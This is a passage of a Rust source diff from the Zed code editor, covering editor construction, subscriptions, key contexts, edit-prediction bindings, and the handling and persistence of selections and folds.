editor.buffer.read(cx).buffer(*id) { + let focus_handle = editor.focus_handle(cx); + if focus_handle.is_focused(window) { + let snapshot = buffer.read(cx).snapshot(); + for (range, snippet) in snippet_edits { + let editor_range = + language::range_from_lsp(*range).to_offset(&snapshot); + editor + .insert_snippet( + &[editor_range], + snippet.clone(), + window, + cx, + ) + .ok(); + } + } + } + } + _ => {} + }, + )); + if let Some(task_inventory) = project + .read(cx) + .task_store() + .read(cx) + .task_inventory() + .cloned() + { + project_subscriptions.push(cx.observe_in( + &task_inventory, + window, + |editor, _, window, cx| { + editor.tasks_update_task = Some(editor.refresh_runnables(window, cx)); + }, + )); + }; + + project_subscriptions.push(cx.subscribe_in( + &project.read(cx).breakpoint_store(), + window, + |editor, _, event, window, cx| match event { + BreakpointStoreEvent::ClearDebugLines => { + editor.clear_row_highlights::(); + editor.refresh_inline_values(cx); + } + BreakpointStoreEvent::SetDebugLine => { + if editor.go_to_active_debug_line(window, cx) { + cx.stop_propagation(); + } + + editor.refresh_inline_values(cx); + } + _ => {} + }, + )); + } + } + + let buffer_snapshot = buffer.read(cx).snapshot(cx); + + let inlay_hint_settings = + inlay_hint_settings(selections.newest_anchor().head(), &buffer_snapshot, cx); + let focus_handle = cx.focus_handle(); + cx.on_focus(&focus_handle, window, Self::handle_focus) + .detach(); + cx.on_focus_in(&focus_handle, window, Self::handle_focus_in) + .detach(); + cx.on_focus_out(&focus_handle, window, Self::handle_focus_out) + .detach(); + cx.on_blur(&focus_handle, window, Self::handle_blur) + .detach(); + + let show_indent_guides = if matches!(mode, EditorMode::SingleLine { .. }) { + Some(false) + } else { + None + }; + + let breakpoint_store = match (mode, project.as_ref()) { + (EditorMode::Full { .. }, Some(project)) => Some(project.read(cx).breakpoint_store()), + _ => None, + }; + + let mut code_action_providers = Vec::new(); + let mut load_uncommitted_diff = None; + if let Some(project) = project.clone() { + load_uncommitted_diff = Some( + get_uncommitted_diff_for_buffer( + &project, + buffer.read(cx).all_buffers(), + buffer.clone(), + cx, + ) + .shared(), + ); + code_action_providers.push(Rc::new(project) as Rc<_>); + } + + let mut this = Self { + focus_handle, + show_cursor_when_unfocused: false, + last_focused_descendant: None, + buffer: buffer.clone(), + display_map: display_map.clone(), + selections, + scroll_manager: ScrollManager::new(cx), + columnar_selection_tail: None, + add_selections_state: None, + select_next_state: None, + select_prev_state: None, + selection_history: Default::default(), + autoclose_regions: Default::default(), + snippet_stack: Default::default(), + select_syntax_node_history: SelectSyntaxNodeHistory::default(), + ime_transaction: Default::default(), + active_diagnostics: ActiveDiagnostic::None, + show_inline_diagnostics: ProjectSettings::get_global(cx).diagnostics.inline.enabled, + inline_diagnostics_update: Task::ready(()), + inline_diagnostics: Vec::new(), + soft_wrap_mode_override, + hard_wrap: None, + completion_provider: project.clone().map(|project| Box::new(project) as _), + semantics_provider: project.clone().map(|project| Rc::new(project) as _), + collaboration_hub: project.clone().map(|project| Box::new(project) as _), + project, + blink_manager: blink_manager.clone(), + show_local_selections: true, + show_scrollbars: true, + disable_scrolling: false, + mode, + show_breadcrumbs: EditorSettings::get_global(cx).toolbar.breadcrumbs, + show_gutter: mode.is_full(), + show_line_numbers: None, + use_relative_line_numbers: None, + disable_expand_excerpt_buttons: false, + show_git_diff_gutter: None, + show_code_actions: None, + show_runnables: None, + show_breakpoints: None, + show_wrap_guides: None, + show_indent_guides, + placeholder_text: None, + highlight_order: 0, + highlighted_rows: HashMap::default(), + background_highlights: Default::default(), + gutter_highlights: TreeMap::default(), + scrollbar_marker_state: ScrollbarMarkerState::default(), + active_indent_guides_state: ActiveIndentGuidesState::default(), + nav_history: None, + context_menu: RefCell::new(None), + context_menu_options: None, + mouse_context_menu: None, + completion_tasks: Default::default(), + inline_blame_popover: Default::default(), + signature_help_state: SignatureHelpState::default(), + auto_signature_help: None, + find_all_references_task_sources: Vec::new(), + next_completion_id: 0, + next_inlay_id: 0, + code_action_providers, + available_code_actions: Default::default(), + code_actions_task: Default::default(), + quick_selection_highlight_task: Default::default(), + debounced_selection_highlight_task: Default::default(), + document_highlights_task: Default::default(), + linked_editing_range_task: Default::default(), + pending_rename: Default::default(), + searchable: true, + cursor_shape: EditorSettings::get_global(cx) + .cursor_shape + .unwrap_or_default(), + current_line_highlight: None, + autoindent_mode: Some(AutoindentMode::EachLine), + collapse_matches: false, + workspace: None, + input_enabled: true, + use_modal_editing: mode.is_full(), + read_only: false, + use_autoclose: true, + use_auto_surround: true, + auto_replace_emoji_shortcode: false, + jsx_tag_auto_close_enabled_in_any_buffer: false, + leader_peer_id: None, + remote_id: None, + hover_state: Default::default(), + pending_mouse_down: None, + hovered_link_state: Default::default(), + edit_prediction_provider: None, + active_inline_completion: None, + stale_inline_completion_in_menu: None, + edit_prediction_preview: EditPredictionPreview::Inactive { + released_too_fast: false, + }, + inline_diagnostics_enabled: mode.is_full(), + inline_value_cache: InlineValueCache::new(inlay_hint_settings.show_value_hints), + inlay_hint_cache: InlayHintCache::new(inlay_hint_settings), + + gutter_hovered: false, + pixel_position_of_newest_cursor: None, + last_bounds: None, + last_position_map: None, + expect_bounds_change: None, + gutter_dimensions: GutterDimensions::default(), + style: None, + show_cursor_names: false, + hovered_cursors: Default::default(), + next_editor_action_id: EditorActionId::default(), + editor_actions: Rc::default(), + inline_completions_hidden_for_vim_mode: false, + show_inline_completions_override: None, + menu_inline_completions_policy: MenuInlineCompletionsPolicy::ByProvider, + edit_prediction_settings: EditPredictionSettings::Disabled, + edit_prediction_indent_conflict: false, + edit_prediction_requires_modifier_in_indent_conflict: true, + custom_context_menu: None, + show_git_blame_gutter: false, + show_git_blame_inline: false, + show_selection_menu: None, + show_git_blame_inline_delay_task: None, + git_blame_inline_enabled: ProjectSettings::get_global(cx).git.inline_blame_enabled(), + render_diff_hunk_controls: Arc::new(render_diff_hunk_controls), + serialize_dirty_buffers: ProjectSettings::get_global(cx) + .session + .restore_unsaved_buffers, + blame: None, + blame_subscription: None, + tasks: Default::default(), + + breakpoint_store, + gutter_breakpoint_indicator: (None, None), + _subscriptions: vec![ + cx.observe(&buffer, Self::on_buffer_changed), + cx.subscribe_in(&buffer, window, Self::on_buffer_event), + cx.observe_in(&display_map, window, Self::on_display_map_changed), + cx.observe(&blink_manager, |_, _, cx| cx.notify()), + cx.observe_global_in::(window, Self::settings_changed), + observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), + cx.observe_window_activation(window, |editor, window, cx| { + let active = window.is_window_active(); + editor.blink_manager.update(cx, |blink_manager, cx| { + if active { + blink_manager.enable(cx); + } else { + blink_manager.disable(cx); + } + }); + }), + ], + tasks_update_task: None, + linked_edit_ranges: Default::default(), + in_project_search: false, + previous_search_ranges: None, + breadcrumb_header: None, + focused_block: None, + next_scroll_position: NextScrollCursorCenterTopBottom::default(), + addons: HashMap::default(), + registered_buffers: HashMap::default(), + _scroll_cursor_center_top_bottom_task: Task::ready(()), + selection_mark_mode: false, + toggle_fold_multiple_buffers: Task::ready(()), + serialize_selections: Task::ready(()), + serialize_folds: Task::ready(()), + text_style_refinement: None, + load_diff_task: load_uncommitted_diff, + mouse_cursor_hidden: false, + hide_mouse_mode: EditorSettings::get_global(cx) + .hide_mouse + .unwrap_or_default(), + change_list: ChangeList::new(), + }; + if let Some(breakpoints) = this.breakpoint_store.as_ref() { + this._subscriptions + .push(cx.observe(breakpoints, |_, _, cx| { + cx.notify(); + })); + } + this.tasks_update_task = Some(this.refresh_runnables(window, cx)); + this._subscriptions.extend(project_subscriptions); + + this._subscriptions.push(cx.subscribe_in( + &cx.entity(), + window, + |editor, _, e: &EditorEvent, window, cx| match e { + EditorEvent::ScrollPositionChanged { local, .. } => { + if *local { + let new_anchor = editor.scroll_manager.anchor(); + let snapshot = editor.snapshot(window, cx); + editor.update_restoration_data(cx, move |data| { + data.scroll_position = ( + new_anchor.top_row(&snapshot.buffer_snapshot), + new_anchor.offset, + ); + }); + editor.hide_signature_help(cx, SignatureHelpHiddenBy::Escape); + editor.inline_blame_popover.take(); + } + } + EditorEvent::Edited { .. } => { + if !vim_enabled(cx) { + let (map, selections) = editor.selections.all_adjusted_display(cx); + let pop_state = editor + .change_list + .last() + .map(|previous| { + previous.len() == selections.len() + && previous.iter().enumerate().all(|(ix, p)| { + p.to_display_point(&map).row() + == selections[ix].head().row() + }) + }) + .unwrap_or(false); + let new_positions = selections + .into_iter() + .map(|s| map.display_point_to_anchor(s.head(), Bias::Left)) + .collect(); + editor + .change_list + .push_to_change_list(pop_state, new_positions); + } + } + _ => (), + }, + )); + + if let Some(dap_store) = this + .project + .as_ref() + .map(|project| project.read(cx).dap_store()) + { + let weak_editor = cx.weak_entity(); + + this._subscriptions + .push( + cx.observe_new::(move |_, _, cx| { + let session_entity = cx.entity(); + weak_editor + .update(cx, |editor, cx| { + editor._subscriptions.push( + cx.subscribe(&session_entity, Self::on_debug_session_event), + ); + }) + .ok(); + }), + ); + + for session in dap_store.read(cx).sessions().cloned().collect::>() { + this._subscriptions + .push(cx.subscribe(&session, Self::on_debug_session_event)); + } + } + + this.end_selection(window, cx); + this.scroll_manager.show_scrollbars(window, cx); + jsx_tag_auto_close::refresh_enabled_in_any_buffer(&mut this, &buffer, cx); + + if mode.is_full() { + let should_auto_hide_scrollbars = cx.should_auto_hide_scrollbars(); + cx.set_global(ScrollbarAutoHide(should_auto_hide_scrollbars)); + + if this.git_blame_inline_enabled { + this.git_blame_inline_enabled = true; + this.start_git_blame_inline(false, window, cx); + } + + this.go_to_active_debug_line(window, cx); + + if let Some(buffer) = buffer.read(cx).as_singleton() { + if let Some(project) = this.project.as_ref() { + let handle = project.update(cx, |project, cx| { + project.register_buffer_with_language_servers(&buffer, cx) + }); + this.registered_buffers + .insert(buffer.read(cx).remote_id(), handle); + } + } + } + + this.report_editor_event("Editor Opened", None, cx); + this + } + + pub fn deploy_mouse_context_menu( + &mut self, + position: gpui::Point, + context_menu: Entity, + window: &mut Window, + cx: &mut Context, + ) { + self.mouse_context_menu = Some(MouseContextMenu::new( + self, + crate::mouse_context_menu::MenuPosition::PinnedToScreen(position), + context_menu, + window, + cx, + )); + } + + pub fn mouse_menu_is_focused(&self, window: &Window, cx: &App) -> bool { + self.mouse_context_menu + .as_ref() + .is_some_and(|menu| menu.context_menu.focus_handle(cx).is_focused(window)) + } + + fn key_context(&self, window: &Window, cx: &App) -> KeyContext { + self.key_context_internal(self.has_active_inline_completion(), window, cx) + } + + fn key_context_internal( + &self, + has_active_edit_prediction: bool, + window: &Window, + cx: &App, + ) -> KeyContext { + let mut key_context = KeyContext::new_with_defaults(); + key_context.add("Editor"); + let mode = match self.mode { + EditorMode::SingleLine { .. } => "single_line", + EditorMode::AutoHeight { .. } => "auto_height", + EditorMode::Full { .. } => "full", + }; + + if EditorSettings::jupyter_enabled(cx) { + key_context.add("jupyter"); + } + + key_context.set("mode", mode); + if self.pending_rename.is_some() { + key_context.add("renaming"); + } + + match self.context_menu.borrow().as_ref() { + Some(CodeContextMenu::Completions(_)) => { + key_context.add("menu"); + key_context.add("showing_completions"); + } + Some(CodeContextMenu::CodeActions(_)) => { + key_context.add("menu"); + key_context.add("showing_code_actions") + } + None => {} + } + + // Disable vim contexts when a sub-editor (e.g. rename/inline assistant) is focused. + if !self.focus_handle(cx).contains_focused(window, cx) + || (self.is_focused(window) || self.mouse_menu_is_focused(window, cx)) + { + for addon in self.addons.values() { + addon.extend_key_context(&mut key_context, cx) + } + } + + if let Some(singleton_buffer) = self.buffer.read(cx).as_singleton() { + if let Some(extension) = singleton_buffer + .read(cx) + .file() + .and_then(|file| file.path().extension()?.to_str()) + { + key_context.set("extension", extension.to_string()); + } + } else { + key_context.add("multibuffer"); + } + + if has_active_edit_prediction { + if self.edit_prediction_in_conflict() { + key_context.add(EDIT_PREDICTION_CONFLICT_KEY_CONTEXT); + } else { + key_context.add(EDIT_PREDICTION_KEY_CONTEXT); + key_context.add("copilot_suggestion"); + } + } + + if self.selection_mark_mode { + key_context.add("selection_mode"); + } + + key_context + } + + pub fn hide_mouse_cursor(&mut self, origin: &HideMouseCursorOrigin) { + self.mouse_cursor_hidden = match origin { + HideMouseCursorOrigin::TypingAction => { + matches!( + self.hide_mouse_mode, + HideMouseMode::OnTyping | HideMouseMode::OnTypingAndMovement + ) + } + HideMouseCursorOrigin::MovementAction => { + matches!(self.hide_mouse_mode, HideMouseMode::OnTypingAndMovement) + } + }; + } + + pub fn edit_prediction_in_conflict(&self) -> bool { + if !self.show_edit_predictions_in_menu() { + return false; + } + + let showing_completions = self + .context_menu + .borrow() + .as_ref() + .map_or(false, |context| { + matches!(context, CodeContextMenu::Completions(_)) + }); + + showing_completions + || self.edit_prediction_requires_modifier() + // Require modifier key when the cursor is on leading whitespace, to allow `tab` + // bindings to insert tab characters. + || (self.edit_prediction_requires_modifier_in_indent_conflict && self.edit_prediction_indent_conflict) + } + + pub fn accept_edit_prediction_keybind( + &self, + window: &Window, + cx: &App, + ) -> AcceptEditPredictionBinding { + let key_context = self.key_context_internal(true, window, cx); + let in_conflict = self.edit_prediction_in_conflict(); + + AcceptEditPredictionBinding( + window + .bindings_for_action_in_context(&AcceptEditPrediction, key_context) + .into_iter() + .filter(|binding| { + !in_conflict + || binding + .keystrokes() + .first() + .map_or(false, |keystroke| keystroke.modifiers.modified()) + }) + .rev() + .min_by_key(|binding| { + binding + .keystrokes() + .first() + .map_or(u8::MAX, |k| k.modifiers.number_of_modifiers()) + }), + ) + } + + pub fn new_file( + workspace: &mut Workspace, + _: &workspace::NewFile, + window: &mut Window, + cx: &mut Context, + ) { + Self::new_in_workspace(workspace, window, cx).detach_and_prompt_err( + "Failed to create buffer", + window, + cx, + |e, _, _| match e.error_code() { + ErrorCode::RemoteUpgradeRequired => Some(format!( + "The remote instance of Zed does not support this yet. It must be upgraded to {}", + e.error_tag("required").unwrap_or("the latest version") + )), + _ => None, + }, + ); + } + + pub fn new_in_workspace( + workspace: &mut Workspace, + window: &mut Window, + cx: &mut Context, + ) -> Task>> { + let project = workspace.project().clone(); + let create = project.update(cx, |project, cx| project.create_buffer(cx)); + + cx.spawn_in(window, async move |workspace, cx| { + let buffer = create.await?; + workspace.update_in(cx, |workspace, window, cx| { + let editor = + cx.new(|cx| Editor::for_buffer(buffer, Some(project.clone()), window, cx)); + workspace.add_item_to_active_pane(Box::new(editor.clone()), None, true, window, cx); + editor + }) + }) + } + + fn new_file_vertical( + workspace: &mut Workspace, + _: &workspace::NewFileSplitVertical, + window: &mut Window, + cx: &mut Context, + ) { + Self::new_file_in_direction(workspace, SplitDirection::vertical(cx), window, cx) + } + + fn new_file_horizontal( + workspace: &mut Workspace, + _: &workspace::NewFileSplitHorizontal, + window: &mut Window, + cx: &mut Context, + ) { + Self::new_file_in_direction(workspace, SplitDirection::horizontal(cx), window, cx) + } + + fn new_file_in_direction( + workspace: &mut Workspace, + direction: SplitDirection, + window: &mut Window, + cx: &mut Context, + ) { + let project = workspace.project().clone(); + let create = project.update(cx, |project, cx| project.create_buffer(cx)); + + cx.spawn_in(window, async move |workspace, cx| { + let buffer = create.await?; + workspace.update_in(cx, move |workspace, window, cx| { + workspace.split_item( + direction, + Box::new( + cx.new(|cx| Editor::for_buffer(buffer, Some(project.clone()), window, cx)), + ), + window, + cx, + ) + })?; + anyhow::Ok(()) + }) + .detach_and_prompt_err("Failed to create buffer", window, cx, |e, _, _| { + match e.error_code() { + ErrorCode::RemoteUpgradeRequired => Some(format!( + "The remote instance of Zed does not support this yet. It must be upgraded to {}", + e.error_tag("required").unwrap_or("the latest version") + )), + _ => None, + } + }); + } + + pub fn leader_peer_id(&self) -> Option { + self.leader_peer_id + } + + pub fn buffer(&self) -> &Entity { + &self.buffer + } + + pub fn workspace(&self) -> Option> { + self.workspace.as_ref()?.0.upgrade() + } + + pub fn title<'a>(&self, cx: &'a App) -> Cow<'a, str> { + self.buffer().read(cx).title(cx) + } + + pub fn snapshot(&self, window: &mut Window, cx: &mut App) -> EditorSnapshot { + let git_blame_gutter_max_author_length = self + .render_git_blame_gutter(cx) + .then(|| { + if let Some(blame) = self.blame.as_ref() { + let max_author_length = + blame.update(cx, |blame, cx| blame.max_author_length(cx)); + Some(max_author_length) + } else { + None + } + }) + .flatten(); + + EditorSnapshot { + mode: self.mode, + show_gutter: self.show_gutter, + show_line_numbers: self.show_line_numbers, + show_git_diff_gutter: self.show_git_diff_gutter, + show_code_actions: self.show_code_actions, + show_runnables: self.show_runnables, + show_breakpoints: self.show_breakpoints, + git_blame_gutter_max_author_length, + display_snapshot: self.display_map.update(cx, |map, cx| map.snapshot(cx)), + scroll_anchor: self.scroll_manager.anchor(), + ongoing_scroll: self.scroll_manager.ongoing_scroll(), + placeholder_text: self.placeholder_text.clone(), + is_focused: self.focus_handle.is_focused(window), + current_line_highlight: self + .current_line_highlight + .unwrap_or_else(|| EditorSettings::get_global(cx).current_line_highlight), + gutter_hovered: self.gutter_hovered, + } + } + + pub fn language_at(&self, point: T, cx: &App) -> Option> { + self.buffer.read(cx).language_at(point, cx) + } + + pub fn file_at(&self, point: T, cx: &App) -> Option> { + self.buffer.read(cx).read(cx).file_at(point).cloned() + } + + pub fn active_excerpt( + &self, + cx: &App, + ) -> Option<(ExcerptId, Entity, Range)> { + self.buffer + .read(cx) + .excerpt_containing(self.selections.newest_anchor().head(), cx) + } + + pub fn mode(&self) -> EditorMode { + self.mode + } + + pub fn set_mode(&mut self, mode: EditorMode) { + self.mode = mode; + } + + pub fn collaboration_hub(&self) -> Option<&dyn CollaborationHub> { + self.collaboration_hub.as_deref() + } + + pub fn set_collaboration_hub(&mut self, hub: Box) { + self.collaboration_hub = Some(hub); + } + + pub fn set_in_project_search(&mut self, in_project_search: bool) { + self.in_project_search = in_project_search; + } + + pub fn set_custom_context_menu( + &mut self, + f: impl 'static + + Fn( + &mut Self, + DisplayPoint, + &mut Window, + &mut Context, + ) -> Option>, + ) { + self.custom_context_menu = Some(Box::new(f)) + } + + pub fn set_completion_provider(&mut self, provider: Option>) { + self.completion_provider = provider; + } + + pub fn semantics_provider(&self) -> Option> { + self.semantics_provider.clone() + } + + pub fn set_semantics_provider(&mut self, provider: Option>) { + self.semantics_provider = provider; + } + + pub fn set_edit_prediction_provider( + &mut self, + provider: Option>, + window: &mut Window, + cx: &mut Context, + ) where + T: EditPredictionProvider, + { + self.edit_prediction_provider = + provider.map(|provider| RegisteredInlineCompletionProvider { + _subscription: cx.observe_in(&provider, window, |this, _, window, cx| { + if this.focus_handle.is_focused(window) { + this.update_visible_inline_completion(window, cx); + } + }), + provider: Arc::new(provider), + }); + self.update_edit_prediction_settings(cx); + self.refresh_inline_completion(false, false, window, cx); + } + + pub fn placeholder_text(&self) -> Option<&str> { + self.placeholder_text.as_deref() + } + + pub fn set_placeholder_text( + &mut self, + placeholder_text: impl Into>, + cx: &mut Context, + ) { + let placeholder_text = Some(placeholder_text.into()); + if self.placeholder_text != placeholder_text { + self.placeholder_text = placeholder_text; + cx.notify(); + } + } + + pub fn set_cursor_shape(&mut self, cursor_shape: CursorShape, cx: &mut Context) { + self.cursor_shape = cursor_shape; + + // Disrupt blink for immediate user feedback that the cursor shape has changed + self.blink_manager.update(cx, BlinkManager::show_cursor); + + cx.notify(); + } + + pub fn set_current_line_highlight( + &mut self, + current_line_highlight: Option, + ) { + self.current_line_highlight = current_line_highlight; + } + + pub fn set_collapse_matches(&mut self, collapse_matches: bool) { + self.collapse_matches = collapse_matches; + } + + fn register_buffers_with_language_servers(&mut self, cx: &mut Context) { + let buffers = self.buffer.read(cx).all_buffers(); + let Some(project) = self.project.as_ref() else { + return; + }; + project.update(cx, |project, cx| { + for buffer in buffers { + self.registered_buffers + .entry(buffer.read(cx).remote_id()) + .or_insert_with(|| project.register_buffer_with_language_servers(&buffer, cx)); + } + }) + } + + pub fn range_for_match(&self, range: &Range) -> Range { + if self.collapse_matches { + return range.start..range.start; + } + range.clone() + } + + pub fn set_clip_at_line_ends(&mut self, clip: bool, cx: &mut Context) { + if self.display_map.read(cx).clip_at_line_ends != clip { + self.display_map + .update(cx, |map, _| map.clip_at_line_ends = clip); + } + } + + pub fn set_input_enabled(&mut self, input_enabled: bool) { + self.input_enabled = input_enabled; + } + + pub fn set_inline_completions_hidden_for_vim_mode( + &mut self, + hidden: bool, + window: &mut Window, + cx: &mut Context, + ) { + if hidden != self.inline_completions_hidden_for_vim_mode { + self.inline_completions_hidden_for_vim_mode = hidden; + if hidden { + self.update_visible_inline_completion(window, cx); + } else { + self.refresh_inline_completion(true, false, window, cx); + } + } + } + + pub fn set_menu_inline_completions_policy(&mut self, value: MenuInlineCompletionsPolicy) { + self.menu_inline_completions_policy = value; + } + + pub fn set_autoindent(&mut self, autoindent: bool) { + if autoindent { + self.autoindent_mode = Some(AutoindentMode::EachLine); + } else { + self.autoindent_mode = None; + } + } + + pub fn read_only(&self, cx: &App) -> bool { + self.read_only || self.buffer.read(cx).read_only() + } + + pub fn set_read_only(&mut self, read_only: bool) { + self.read_only = read_only; + } + + pub fn set_use_autoclose(&mut self, autoclose: bool) { + self.use_autoclose = autoclose; + } + + pub fn set_use_auto_surround(&mut self, auto_surround: bool) { + self.use_auto_surround = auto_surround; + } + + pub fn set_auto_replace_emoji_shortcode(&mut self, auto_replace: bool) { + self.auto_replace_emoji_shortcode = auto_replace; + } + + pub fn toggle_edit_predictions( + &mut self, + _: &ToggleEditPrediction, + window: &mut Window, + cx: &mut Context, + ) { + if self.show_inline_completions_override.is_some() { + self.set_show_edit_predictions(None, window, cx); + } else { + let show_edit_predictions = !self.edit_predictions_enabled(); + self.set_show_edit_predictions(Some(show_edit_predictions), window, cx); + } + } + + pub fn set_show_edit_predictions( + &mut self, + show_edit_predictions: Option, + window: &mut Window, + cx: &mut Context, + ) { + self.show_inline_completions_override = show_edit_predictions; + self.update_edit_prediction_settings(cx); + + if let Some(false) = show_edit_predictions { + self.discard_inline_completion(false, cx); + } else { + self.refresh_inline_completion(false, true, window, cx); + } + } + + fn inline_completions_disabled_in_scope( + &self, + buffer: &Entity, + buffer_position: language::Anchor, + cx: &App, + ) -> bool { + let snapshot = buffer.read(cx).snapshot(); + let settings = snapshot.settings_at(buffer_position, cx); + + let Some(scope) = snapshot.language_scope_at(buffer_position) else { + return false; + }; + + scope.override_name().map_or(false, |scope_name| { + settings + .edit_predictions_disabled_in + .iter() + .any(|s| s == scope_name) + }) + } + + pub fn set_use_modal_editing(&mut self, to: bool) { + self.use_modal_editing = to; + } + + pub fn use_modal_editing(&self) -> bool { + self.use_modal_editing + } + + fn selections_did_change( + &mut self, + local: bool, + old_cursor_position: &Anchor, + show_completions: bool, + window: &mut Window, + cx: &mut Context, + ) { + window.invalidate_character_coordinates(); + + // Copy selections to primary selection buffer + #[cfg(any(target_os = "linux", target_os = "freebsd"))] + if local { + let selections = self.selections.all::(cx); + let buffer_handle = self.buffer.read(cx).read(cx); + + let mut text = String::new(); + for (index, selection) in selections.iter().enumerate() { + let text_for_selection = buffer_handle + .text_for_range(selection.start..selection.end) + .collect::(); + + text.push_str(&text_for_selection); + if index != selections.len() - 1 { + text.push('\n'); + } + } + + if !text.is_empty() { + cx.write_to_primary(ClipboardItem::new_string(text)); + } + } + + if self.focus_handle.is_focused(window) && self.leader_peer_id.is_none() { + self.buffer.update(cx, |buffer, cx| { + buffer.set_active_selections( + &self.selections.disjoint_anchors(), + self.selections.line_mode, + self.cursor_shape, + cx, + ) + }); + } + let display_map = self + .display_map + .update(cx, |display_map, cx| display_map.snapshot(cx)); + let buffer = &display_map.buffer_snapshot; + self.add_selections_state = None; + self.select_next_state = None; + self.select_prev_state = None; + self.select_syntax_node_history.try_clear(); + self.invalidate_autoclose_regions(&self.selections.disjoint_anchors(), buffer); + self.snippet_stack + .invalidate(&self.selections.disjoint_anchors(), buffer); + self.take_rename(false, window, cx); + + let new_cursor_position = self.selections.newest_anchor().head(); + + self.push_to_nav_history( + *old_cursor_position, + Some(new_cursor_position.to_point(buffer)), + false, + cx, + ); + + if local { + let new_cursor_position = self.selections.newest_anchor().head(); + let mut context_menu = self.context_menu.borrow_mut(); + let completion_menu = match context_menu.as_ref() { + Some(CodeContextMenu::Completions(menu)) => Some(menu), + _ => { + *context_menu = None; + None + } + }; + if let Some(buffer_id) = new_cursor_position.buffer_id { + if !self.registered_buffers.contains_key(&buffer_id) { + if let Some(project) = self.project.as_ref() { + project.update(cx, |project, cx| { + let Some(buffer) = self.buffer.read(cx).buffer(buffer_id) else { + return; + }; + self.registered_buffers.insert( + buffer_id, + project.register_buffer_with_language_servers(&buffer, cx), + ); + }) + } + } + } + + if let Some(completion_menu) = completion_menu { + let cursor_position = new_cursor_position.to_offset(buffer); + let (word_range, kind) = + buffer.surrounding_word(completion_menu.initial_position, true); + if kind == Some(CharKind::Word) + && word_range.to_inclusive().contains(&cursor_position) + { + let mut completion_menu = completion_menu.clone(); + drop(context_menu); + + let query = Self::completion_query(buffer, cursor_position); + cx.spawn(async move |this, cx| { + completion_menu + .filter(query.as_deref(), cx.background_executor().clone()) + .await; + + this.update(cx, |this, cx| { + let mut context_menu = this.context_menu.borrow_mut(); + let Some(CodeContextMenu::Completions(menu)) = context_menu.as_ref() + else { + return; + }; + + if menu.id > completion_menu.id { + return; + } + + *context_menu = Some(CodeContextMenu::Completions(completion_menu)); + drop(context_menu); + cx.notify(); + }) + }) + .detach(); + + if show_completions { + self.show_completions(&ShowCompletions { trigger: None }, window, cx); + } + } else { + drop(context_menu); + self.hide_context_menu(window, cx); + } + } else { + drop(context_menu); + } + + hide_hover(self, cx); + + if old_cursor_position.to_display_point(&display_map).row() + != new_cursor_position.to_display_point(&display_map).row() + { + self.available_code_actions.take(); + } + self.refresh_code_actions(window, cx); + self.refresh_document_highlights(cx); + self.refresh_selected_text_highlights(false, window, cx); + refresh_matching_bracket_highlights(self, window, cx); + self.update_visible_inline_completion(window, cx); + self.edit_prediction_requires_modifier_in_indent_conflict = true; + linked_editing_ranges::refresh_linked_ranges(self, window, cx); + self.inline_blame_popover.take(); + if self.git_blame_inline_enabled { + self.start_inline_blame_timer(window, cx); + } + } + + self.blink_manager.update(cx, BlinkManager::pause_blinking); + cx.emit(EditorEvent::SelectionsChanged { local }); + + let selections = &self.selections.disjoint; + if selections.len() == 1 { + cx.emit(SearchEvent::ActiveMatchChanged) + } + if local { + if let Some((_, _, buffer_snapshot)) = buffer.as_singleton() { + let inmemory_selections = selections + .iter() + .map(|s| { + text::ToPoint::to_point(&s.range().start.text_anchor, buffer_snapshot) + ..text::ToPoint::to_point(&s.range().end.text_anchor, buffer_snapshot) + }) + .collect(); + self.update_restoration_data(cx, |data| { + data.selections = inmemory_selections; + }); + + if WorkspaceSettings::get(None, cx).restore_on_startup + != RestoreOnStartupBehavior::None + { + if let Some(workspace_id) = + self.workspace.as_ref().and_then(|workspace| workspace.1) + { + let snapshot = self.buffer().read(cx).snapshot(cx); + let selections = selections.clone(); + let background_executor = cx.background_executor().clone(); + let editor_id = cx.entity().entity_id().as_u64() as ItemId; + self.serialize_selections = cx.background_spawn(async move { + background_executor.timer(SERIALIZATION_THROTTLE_TIME).await; + let db_selections = selections + .iter() + .map(|selection| { + ( + selection.start.to_offset(&snapshot), + selection.end.to_offset(&snapshot), + ) + }) + .collect(); + + DB.save_editor_selections(editor_id, workspace_id, db_selections) + .await + .with_context(|| format!("persisting editor selections for editor {editor_id}, workspace {workspace_id:?}")) + .log_err(); + }); + } + } + } + } + + cx.notify(); + } + + fn folds_did_change(&mut self, cx: &mut Context) { + use text::ToOffset as _; + use text::ToPoint as _; + + if WorkspaceSettings::get(None, cx).restore_on_startup == RestoreOnStartupBehavior::None { + return; + } + + let Some(singleton) = self.buffer().read(cx).as_singleton() else { + return; + }; + + let snapshot = singleton.read(cx).snapshot(); + let inmemory_folds = self.display_map.update(cx, |display_map, cx| { + let display_snapshot = display_map.snapshot(cx); + + display_snapshot + .folds_in_range(0..display_snapshot.buffer_snapshot.len()) + .map(|fold| { + fold.range.start.text_anchor.to_point(&snapshot) + ..fold.range.end.text_anchor.to_point(&snapshot) + }) + .collect() + }); + self.update_restoration_data(cx, |data| { + data.folds = inmemory_folds; + }); + + let Some(workspace_id) = self.workspace.as_ref().and_then(|workspace| workspace.1) else { + return; + }; + let background_executor = cx.background_executor().clone(); + let editor_id = cx.entity().entity_id().as_u64() as ItemId; + let db_folds = self.display_map.update(cx, |display_map, cx| { + display_map + .snapshot(cx) + .folds_in_range(0..snapshot.len()) + .map(|fold| { + ( + fold.range.start.text_anchor.to_offset(&snapshot), + fold.range.end.text_anchor.to_offset(&snapshot), + ) + }) + .collect() + }); + self.serialize_folds = cx.background_spawn(async move { + background_executor.timer(SERIALIZATION_THROTTLE_TIME).await; + DB.save_editor_folds(editor_id, workspace_id, db_folds) + .await + .with_context(|| { + format!( + "persisting editor folds for editor {editor_id}, workspace {workspace_id:?}" + ) + }) + .log_err(); + }); + } + + pub fn sync_selections( + &mut self, + other: Entity, + cx: &mut Context, + ) -> gpui::Subscription { + let other_selections = other.read(cx).selections.disjoint.to_vec(); + self.selections.change_with(cx, |selections| { + selections.select_anchors(other_selections); + }); + + let other_subscription = + cx.subscribe(&other, |this, other, other_evt, cx| match other_evt { + EditorEvent::SelectionsChanged { local: true } => { + let other_selections = other.read(cx).selections.disjoint.to_vec(); + if other_selections.is_empty() { + return; + } + this.selections.change_with(cx, |selections| { + selections.select_anchors(other_selections); + }); + } + _ => {} + }); + + let this_subscription = + cx.subscribe_self::(move |this, this_evt, cx| match this_evt { + EditorEvent::SelectionsChanged { local: true } => { + let these_selections = this.selections.disjoint.to_vec(); + if these_selections.is_empty() { + return; + } + other.update(cx, |other_editor, cx| { + other_editor.selections.change_with(cx, |selections| { + 